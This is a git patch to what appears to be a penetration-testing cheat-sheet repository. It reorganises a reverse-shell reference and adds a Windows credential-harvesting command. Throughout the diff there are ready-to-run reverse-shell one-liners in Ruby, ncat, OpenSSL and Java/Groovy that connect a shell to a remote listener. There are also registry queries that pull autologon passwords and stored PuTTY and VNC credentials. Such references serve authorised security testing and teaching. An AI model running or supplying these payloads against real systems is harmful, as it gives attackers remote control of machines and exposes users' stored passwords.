From 3af87ddf9851263f3ea883ecdef562720c93b412 Mon Sep 17 00:00:00 2001 From: Swissky Date: Tue, 2 Apr 2019 22:43:44 +0200 Subject: [PATCH] Reverse shell summary + golang --- .../Reverse Shell Cheatsheet.md | 36 ++++++++++++++++--- .../Windows - Privilege Escalation.md | 1 + 2 files changed, 32 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 908c494..4868a7c 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -1,6 +1,30 @@ -# Reverse Shell Methods +# Reverse Shell Cheat Sheet -## Reverse Shell Cheat Sheet +## Summary + +* [Reverse Shell](#reverse-shell) + * [Bash TCP](#bash-tcp) + * [Bash UDP](#bash-udp) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Goland](#golang) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [OpenSSL](#openssl) + * [Powershell](#powershell) + * [Awk](#awk) + * [Java](#java) + * [War](#war) + * [Lua](#lua) + * [NodeJS](#nodejs) + * [Groovy](#groovy) +* [Spawn TTY Shell](#spawn-tty-shell) +* [References](#references) + +## Reverse Shell ### Bash TCP @@ -77,6 +101,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c. NOTE: Windows only ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` + ### Golang ```bash @@ -102,7 +127,7 @@ ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash ``` -## OpenSSL +### OpenSSL ```powershell hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes @@ -194,8 +219,9 @@ or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py ``` -### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) +### Groovy +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy ```javascript @@ -205,7 +231,7 @@ String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` -## Spawn TTY +## Spawn TTY Shell Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple `sh` is recommended diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index c4fd7a0..b63bae5 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -209,6 +209,7 @@ REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials